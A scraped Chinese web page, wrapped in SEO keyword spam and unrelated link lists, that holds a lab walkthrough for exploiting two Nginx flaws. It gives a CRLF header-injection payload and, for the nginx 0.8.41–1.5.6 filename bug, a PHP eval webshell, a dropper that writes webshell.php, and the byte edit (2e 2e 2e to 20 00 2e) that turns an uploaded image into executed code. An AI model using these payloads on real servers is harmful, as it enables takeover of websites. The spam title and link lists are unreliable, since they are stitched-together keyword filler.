当前位置: 首页 > wzjs >正文

石家庄免费专业做网站网络宣传推广

石家庄免费专业做网站,网络宣传推广,福建省人民政府 网站建设,网站设计轮播图需要吗一、CRLF注入漏洞 原理:Nginx将传入的url进行解码,对其中的%0a%0d替换成换行符,导致后面的数据注入至头部,造成CRLF 注入漏洞 1、开环境 2、访问网站,并抓包 3、构造请求头 %0ASet-cookie:JSPSESSID%3D1 这样就可以…

一、CRLF注入漏洞

原理:Nginx将传入的url进行解码,对其中的%0a%0d替换成换行符,导致后面的数据注入至头部,造成CRLF 注入漏洞

1、开环境

2、访问网站,并抓包

3、构造请求头

%0ASet-cookie:JSPSESSID%3D1 

这样就可以看到响应头里有我们刚刚添加的cookie了

二、文件名逻辑漏洞

原理:非法字符空格和截止符(\0)会导致Nginx解析URI时的有限状态机混乱,此漏洞可导致目录跨越及代码执行,其影响版本为:nginx 0.8.41 – 1.5.6

1、开环境

2、制造木马

在我们本地新建一个1.jpg(因为这里只能上传图片文件)里面写入一句话木马

<?php @eval($_POST[cmd]);?>

3、上传木马,抓包

4、修改数据包

在文件名的最后加个空格,就可以把木马上传进去

5、放行,访问木马

这里看到木马已经上传进去了

(1)直接访问是访问不到的,我们需要在文件名后加...php然后抓包

(2)抓到包之后修改数据包,把2e 2e 2e修改为20 00 2e

(3)放行

修改完成之后放行就可以访问到木马了

6、测试连接

这里发现我们的木马文件虽然传上去了,但是因为我们的木马文件被编码了,所以直接连是连不上的,所以我们需要重新构造木马文件

7、重新构造文件上传

这串代码的意思是:在当前目录生成一个webshell.php文件,里面是一句话木马

<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>

上传2.jpg,抓包,加空格,放行

访问刚刚上传的文件,这一步是为了执行代码

/uploadfiles/2.jpg...php

还是抓包,修改为20 00 2e

执行成功之后去访问我们木马里写的webshell.php文件

8、访问成功,测试连接

http://www.dtcms.com/wzjs/351548.html

相关文章:

  • 闵行做网站的公司2022适合小学生的简短新闻摘抄
  • 龙岗模板网站建设百度客户端电脑版
  • 厦门做企业网站多少钱百度拍照搜题
  • 做外贸的网站b2c网站如何注册
  • 本地电脑做网站网络服务运营商
  • c 做特产网站易观数据app排行
  • 织梦cms手机网站源码聊石家庄seo
  • 企业建站划算吗网上怎么注册公司免费的
  • wordpress 插件 打不开飞猪关键词排名优化
  • wordpress不同页面广告宁波seo公司推荐
  • 其它类型的定制营销型网站b2b平台运营模式
  • 谁有专门做外挂的网站长安网站优化公司
  • 网站开发专业的领军人物seo查询爱站
  • 手机访问自动跳转到wap网站的代码营业推广怎么写
  • 做网站大概要多青岛网站建设制作
  • 贵阳网站商城建设游戏推广文案
  • iis做网站之vps广告推广赚钱在哪接
  • 模板外贸网站建设网络营销专业好就业吗
  • 网站建设哪些模板号营销策略怎么写
  • 做网站能挣多少钱公司网站制作需要多少钱
  • 可以做任务的创意设计网站宁波seo软件免费课程
  • 广西柳州网站建设推荐制作网站的app
  • dedecms婚纱摄影网站模板搜全网的浏览器
  • 网络网站建设电话推销国外独立网站如何建站
  • 上海建站价格提高工作效率的句子
  • 做地方网站如何盈利免费seo提交工具
  • 设计的比较好的网站东莞网站设计
  • 网站banner做链接杭州谷歌seo公司
  • 怎样才能建网站做app的网站
  • 公司域名不变网站做变动网站推广的平台